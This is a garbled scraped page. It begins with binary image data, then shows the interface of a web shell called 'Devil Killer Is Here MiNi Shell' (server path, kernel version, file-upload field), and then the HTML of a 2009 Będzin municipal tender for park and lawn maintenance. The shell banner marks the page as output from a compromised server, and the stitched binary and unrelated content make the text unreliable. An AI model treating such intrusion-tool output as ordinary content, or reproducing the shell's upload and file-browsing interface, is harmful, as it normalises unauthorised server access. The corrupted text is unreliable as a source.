JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090422/115954-N-2009.html

<p class="kh_header"><b>Będzin: Pielęgnacja  terenów zieleni gminnej</b><br>
<b>Numer ogłoszenia: 115954 - 2009; data zamieszczenia: 22.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Będzina , ul. 11 Listopada 20, 42-500 Będzin, woj. śląskie, tel. 032 267-35-16, faks (032) 267 62 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bedzin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pielęgnacja  terenów zieleni gminnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Wiosenne wygrabienie trawników wraz z zebraniem utylizacją i wywozem odpadów w miejsce unieszkodliwienia.
2.	Koszenie trawników zieleni miejskiej wraz z zebraniem odpadów, utylizacją i wywozem w miejsce unieszkodliwienia.
3.	Pielęgnacja trawników na terenach zieleni miejskiej.
4.	Pielęgnacja żywopłotów i krzewów wraz z zebraniem, utylizacją i wywiezieniem odpadów w miejsce ich unieszkodliwienia.
5.	Wiosenne i jesienne nasadzenia kwiatów wraz z materiałem oraz pielęgnacją nasadzonych kwiatów.
6.	Obcinanie odrostów z drzew i przy drzewach wraz z zebraniem odpadów, utylizacją i wywozem ich w miejsce unieszkodliwienia.
7.	Jesienne grabienie liści wraz z zebraniem, transportem i utylizacją odpadów.
8.	Wykonanie mis wokół drzew i krzewów.
9.	Korowanie drzew i krzewów korą sosnową.
10.	Obcinanie brzegów trawnika przy krawężnikach.
OPIS WYKONYWANYCH ZADAŃ:
1.Wiosenne wygrabienie trawników wraz z zebraniem utylizacją i wywozem odpadów w miejsce unieszkodliwienia: polega na wygrabieniu liści na terenach zieleni gminnej, (każdorazowo zlecane  przez Zamawiającego)  zebraniu zgrabionych liści pod koniec każdego dnia (nie dopuszcza się pozostawienia zgrabionych liści w pryzmach na następny dzień) i przetransportowanie ich do miejsca unieszkodliwienia. Podczas wygrabienia liści należy zebrać i zutylizować wszystkie inne odpady znajdujące się na terenie gdzie prowadzone są prace. Zamawiający nie dopuszcza mechanicznego wydmuchiwania liści z terenów zielonych, oraz zbierania ich urządzeniami typu ssącego.
2.Koszenie trawników zieleni miejskiej wraz z zebraniem odpadów, utylizacją i wywozem w miejsce unieszkodliwienia: polega na koszeniu trawy, chwastów i samosiejek na terenach zieleni miejskiej o podłożu płaskim oraz na skarpach wraz z transportem i utylizacją odpadów  ( każdorazowo zlecane przez Zamawiającego). Trawa po przycięciu nie może być dłuższa niż 5 cm. Koszenie obejmuje również wykoszenie trawy,  chwastów i samosiejek spod żywopłotów oraz na całej powierzchni zielonej w 100%. Koszenie terenów odbywać będzie się 6 krotnie, chyba że nie będzie potrzebne ze względu na warunki pogodowe (np. susza). Skoszona trawa musi zostać ręcznie wygrabiona, załadowana na środek transportu i wywieziona w miejsce utylizacji w tym samym dniu, w którym została skoszona. Nie dopuszcza się pryzmowania skoszonej trawy i pozostawienie jej do dnia następnego na terenie zielonym. Grabienie skoszonej trawy itp. polega na zebraniu odpadu zielonego jak również innych odpadów komunalnych, które po skoszeniu znajdują się na terenie zielonym (śmieci, drobne gałęzie itp.). Dopuszcza się stosowanie urządzeń ssących jednakże po użyciu takiego urządzenia trawnik musi zostać wygrabiony ręcznie  (dotyczy również pozycji nr 11 kosztorysu ofertowego załącznik nr 6 do SIWZ).
3. Pielęgnacja trawników na terenach zieleni miejskiej: polegać będzie na dosianiu nasion traw w miejscach wskazanych przez Zamawiającego oraz nawożeniu trawników nawozami sztucznymi (np. azofoska).
4. Pielęgnacja żywopłotów i krzewów wraz z zebraniem, utylizacją i wywiezieniem odpadów w miejsce ich unieszkodliwienia: pielęgnacja żywopłotów polegać będzie na przycięciu przyrostu z trzech stron ( góra i dwa boki) wycięciu chwastów i samosiewów znajdujących się w żywopłocie zebraniu przyciętego odpadu zielonego i jego transporcie wraz z utylizacją (każdorazowo na zlecenie Zamawiającego). Przewidywana ilość przycinania żywopłotu -  czterokrotnie w czasie trwania umowy. Nie dopuszcza się na płaszczyznach żywopłotu występowania wgłębień i nierówności po przycięciu. 
Odmładzanie krzewów - polegać będzie na wycięciu starszych i suchych gałęzi w części dolnej lub przyziemnej w celu pobudzenia rośliny do wydania młodych liczniejszych pędów wraz z zebraniem transportem odpadów zielonych w miejsce ich unieszkodliwienia. Cięcie krzewów polegać będzie na formowaniu krzewów zgodnie z ich naturalnym pokrojem.
5. Wiosenne i jesienne nasadzenia kwiatów wraz z materiałem oraz pielęgnacją nasadzonych kwiatów:
 -  polega na zlikwidowaniu starych kwietników, wywiezieniu starego materiału zielonego, nawiezieniu ziemi urodzajnej w ilości minimum 10 cm ponad stan trawnika, nasadzeniu kwiatów w ilości 36 szt. na m2, pielęgnacji nasadzonych kwiatów przez cały okres ( od wiosny do jesieni - podlewanie, odchwaszczanie, nawożenie).
- kwiaty nasadzane w okresie wiosennym: pelargonia stojąca, begonia, kanna, starzec, aksamitka,
- kwiaty nasadzane w okresie jesiennym : bratek różnokolorowy.
6. Obcinanie odrostów z drzew i przy drzewach wraz z zebraniem odpadów, utylizacją i wywozem ich w miejsce unieszkodliwienia: polega na obcięciu przyrostu jednorocznego na drzewach i wokół drzew (obcięcie odrostów na drzewach do wysokości 3 m od ziemi), po obcięciu odrostów należy w tym samym dniu zebrać i wywieźć odpad zielony do miejsca utylizacji. Nie dopuszcza się pozostawienie odciętego odpadu zielonego zalegającego wokół drzew na następny dzień.
7. Jesienne grabienie liści wraz z zebraniem, transportem i utylizacją odpadów: polega na grabieniu liści na terenach zieleni miejskiej każdorazowo zlecone przez Zamawiającego wraz z transportem i utylizacją w miejsce unieszkodliwiania odpadów. Na zleconej powierzchni grabienie liści odbywać się będzie sukcesywnie (od momentu zlecenia do wygrabienia ostatniego liścia lub do momentu przykrycia terenu zielonego warstwą śniegu).
Dopuszcza się stosowanie urządzeń ssących w celu usunięcia liści z terenów zielonych. Zebranie zgrabionych liści musi odbywać się pod koniec każdego dnia (nie dopuszcza się pozostawienia zgrabionych liści w pryzmach na następny dzień) wraz z przetransportowaniem ich do miejsca unieszkodliwienia. Podczas wygrabienia liści należy zebrać i zutylizować wszystkie inne odpady znajdujące się na zleconym terenie.
8. Wykonanie mis wokół drzew i krzewów: polega na przekopaniu gleby w skupinach krzewów, żywopłotów, misek przy pojedynczych krzewach, z pieleniem, załadunkiem i wywozem zebranych chwastów i zanieczyszczeń do miejsca unieszkodliwiania odpadów.
9. Korowanie drzew i krzewów korą sosnową: polega na wybraniu starej warstwy kory wokół drzew i krzewów i wyścieleniu nową korą sosnową  wokół drzew i krzewów. Starą korę należy zebrać i wywieść w miejsce unieszkodliwienia odpadów.
10. Obcinanie brzegów trawnika przy krawężnikach: polega na obcinaniu brzegów trawnika łopatą, zgrabieniu darni i wywozie zebranych zanieczyszczeń do miejsca składowania odpadów w celu unieszkodliwienia.
UWAGA !

I. Wykonawca  musi zapewnić  samochód  przeznaczony do czynności kontrolnych z minimum dwoma miejscami dla Zamawiającego oraz minimum jednym miejscem dla Wykonawcy ( koszty związane z wykonywaniem czynności kontrolnych przy użyciu samochodu Wykonawcy należy wliczyć w cenę oferty).
II. Wykonawca do realizacji niniejszego zamówienia musi zapewnić odpowiednia ilość pracowników fizycznych, zapewniającą prawidłowe wykonanie czynności wymienionych powyżej.
1. Kierownik prac odpowiedzialny będzie za prawidłowe wykonywanie zleceń,  podpisywanie protokołów odbioru wykonanych prac oraz  uczestnictwo  w czynnościach kontrolnych wykonywanych przez przedstawicieli Zamawiającego. Kierownik prac musi być dyspozycyjny w czasie prowadzonych prac w godzinach od 7:30 do 15:30 od poniedziałku do piątku na terenie miasta Będzina i zgłaszać się do Urzędu na każde wezwanie uprawnionego przedstawiciela Zamawiającego bez zbędnej zwłoki w ciągu 1 godziny od powiadomienia telefonicznego ( na numer firmowy telefonu stacjonarnego i faksu Wykonawcy bądź na numer telefonu kontaktowego do kierownika prac). 
2.Wszyscy pracownicy oraz  sprzęt przeznaczony do realizacji zamówienia podczas pracy na terenach zielonych miasta Będzina muszą: 
-     w przypadku pracowników mieć założone kamizelki odblaskowe z logo firmy ( logo firmy musi zawierać adres i numer kontaktowy Wykonawcy),
-      w przypadku sprzętu- czytelna informacje umieszczoną na pojeździe zawierającym    nazwę Wykonawcy, adres i numer telefonu kontaktowego.

UWAGA!!!
Prace każdorazowo będą zlecane wpisem do dziennika prac określających termin rozpoczęcia, zakończenia i odbioru prac..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.31.20.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępując do udziału w postępowaniu  obowiązany jest wnieść wadium stosownie do art.45 i następne ustawy Prawo zamówień publicznych 
( tj. Dz. U z 2007r. Nr 223 poz. 1655 ze zm. ) w wysokości: 8000,00 zł ( słownie: osiem tysięcy  00/100) 
2.Wykonawca wnoszący wadium w formie pieniężnej winien przelać je na konto: 
ING Bank Śląski S.A O/Będzin nr 44 1050 1142 1000 0023 0074 0087 z dopiskiem Wadium na zadanie:  Pielęgnacja terenów zieleni gminnej
3.W przypadku wniesienia wadium w  formach niepieniężnych, oryginał wadium należy złożyć w Urzędzie  Miejskim w Będzinie Biuro Zamówień Publicznych pok.117 ul. 11 Listopada 20 ,42-500 Będzin.
4.Wadium może być wnoszone w jednej lub kilku następujących formach:
a)    pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)   gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
5.Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku  bankowym.
6. Wadium wnosi się przed upływem terminu składania ofert.
7.Zamawiający zwraca niezwłocznie wadium jeżeli:
a) upłynął termin związania ofertą,
b)zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
c)zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
8.Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
a)który wycofał ofertę przed upływem terminu składania ofert,
b)który został wykluczony z postępowania,
c)którego oferta została odrzucona.
9.Zamawiajacy zażąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie  pkt.8 ppkt. b) i c), jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty
10.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono  przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
c)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki uczestnictwa w postępowaniu określone są w ustawie z dnia 29 stycznia 2004r. Prawo zamówień publicznych ( dalej Pzp) ( tj. Dz. U z 2007r. Nr 223 poz. 1655 ze zm. ) oraz  w SIWZ. 
1.O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:  
1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
Wymaga się:
a) przedłożenia aktualnego odpisu właściwego rejestru albo aktualnego zaświadczenia  
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne  przepisy wymagają wpisu 
do rejestru lub zgłoszenia do  ewidencji działalności gospodarczej,  wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .
b) posiadania aktualnych zezwoleń wynikających z przepisów:
- ustawy o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2005r. nr 236 poz. 2008 ze zm.) tj. zezwolenie na prowadzenie działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu gminy Będzin, 
- ustawy o odpadach (Dz. U. z 2001r. nr 62 poz. 628 ze zm.) tj. zezwolenie na prowadzenie działalności w zakresie transportu odpadów.
1.2. Posiadają niezbędną  wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
Wymaga się:
a) wykazania wykonanych lub wykonywanych usług  w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy w     
      tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot     
      zamówienia  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz  
      załączeniem  dokumentów  (np. referencje)  potwierdzających że usługi te zostały należycie  
      wykonane.
Wymaga się wykazania  1 usługi w zakresie koszenia trawników wraz z zebraniem odpadów, utylizacją i wywozem w miejsce unieszkodliwienia na powierzchni minimum 40 ha o wartości minimum 180 000,00 zł i w zakresie grabienia liści wraz z zebraniem odpadów, utylizacją i wywozem w miejsce unieszkodliwienia o wartości minimum 15 000,00 zł i 
w zakresie pielęgnacji żywopłotów wraz z zebraniem odpadów, utylizacją i wywozem w miejsce unieszkodliwienia o wartości minimum 30 000,00 zł,

UWAGA!!!
Wykonawca może wykazywać się realizacją usług w zakresie już wykonanym, w sytuacji jednak, gdy całe świadczenie nie zostało zrealizowane. Wartość usług oraz dokumenty potwierdzające ich należytą realizację powinny dotyczyć zakresu już zrealizowanego, a nie objętego umową, która jeszcze nie została wykonana. 

b) dysponowania:
- min.1 osobą  na stanowisko kierownika  prac posiadającego minimum średnie wykształcenie  ogrodnicze i minimum 5 letni staż pracy w ogrodnictwie lub przy zakładaniu i pielęgnacji terenów zielonych   oraz minimum 3 letnim stażem jako kierownik prac.
W przypadku udostępnienia Wykonawcy przez inne podmioty osób zdolnych do wykonania zamówienia Wykonawca winien, przedstawić w ofercie pisemne zobowiązanie tych podmiotów.
c) dysponowania   wymienionymi w poniższej tabeli jednostkami narzędzi i urządzeń:

Lp.	Wyszczególnienie
	Minimalna liczba jednostek
1.	Samochód wykorzystywany do czynności kontrolnych z minimum dwoma miejscami dla Zamawiającego oraz minimum jednym dla Wykonawcy	1
2.	Samochód dostawczy do 3,5 t	1
3.	Ciągnik rolniczy z przyczepą lub samochód ciężarowy do wywozu skoszonej trawy, wygrabionych liści	1
4.	 Kosy spalinowe	10
5.	Ciągnik z kosiarką rotacyjną	1
6.	Kosiarki spalinowe samojezdne	5
7.	Grabie, motyki, widły oraz inny niezbędny sprzęt ręczny	W ilości niezbędnej do realizacji zamówienia

W przypadku udostępnienia Wykonawcy przez inne podmioty niezbędnych do wykonania zamówienia  narzędzi i urządzeń  Wykonawca winien, przedstawić w ofercie pisemne zobowiązanie tych podmiotów.

1.3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia.
1.4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Spełnienie warunków  ppkt. 1.1. b), 1.3, 1.4 ocenianie będzie  na podstawie złożonego oświadczenia  na lub według  druku stanowiącego załącznik nr 2 do SIWZ  według reguły spełnia- nie spełnia.

Z postępowania o udzielenie zamówienia wyklucza się:
1) Wykonawców, którzy wyrządzili szkodę nie, wykonując zamówienia lub wykonując je nienależycie, a szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym 
w okresie 3 lat przed wszczęciem postępowania;
2)	 Wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono,
z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony
prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli
poprzez likwidację majątku upadłego;
3)	 Wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4)	 osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku 
z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
5)	spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
6)	spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano 
za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
7)	spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
8)	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
9)	podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, 
na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
10)Wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w części  V pkt 1.1 - 1.3 SIWZ.
Z postępowania o udzielenie zamówienia wyklucza się również Wykonawców, którzy:
1)	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi 
w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji;
2)	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
3)	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, 
z zastrzeżeniem art.26 ust.3 ustawy Pzp;
4)	nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.
2. Wykonawcy, którzy wspólnie ubiegać się będą o udzielenie zamówienia winni: 
a) ustanowić sposób  reprezentacji poprzez wyznaczenie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu  
i zawarcia umowy  i dołączyć do oferty dokument pełnomocnictwa, 
b) łącznie wykazać, iż posiadają niezbędną  wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia oraz znajdują się w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
c)  opisać ofertę w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.
3. Wykonawca może powierzyć wykonanie zamówienia Podwykonawcom.
Wykonawca winien wskazać w ofercie części zamówienia, której wykonanie powierzy Podwykonawcom.
3.1. Wykonawca może zawrzeć umowę z Podwykonawcą  po uzyskaniu zgody od Zamawiającego.
(Wykonawca winien przedstawić do akceptacji Zamawiającemu umowę lub projekt umowy zawierający zapis dot. zakresu  prac i sposobu rozliczeń finansowych pomiędzy  Zamawiającym, Wykonawcą  i Podwykonawcą). 
4.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 1.1.a części V specyfikacji składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości;
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie
wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów zastępuje się je dokumentem zawierającym oświadczenie złożone przed  notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach 
i oświadczeniach złożonych przez Wykonawcę.
Niespełnienie chociażby jednego z ww warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
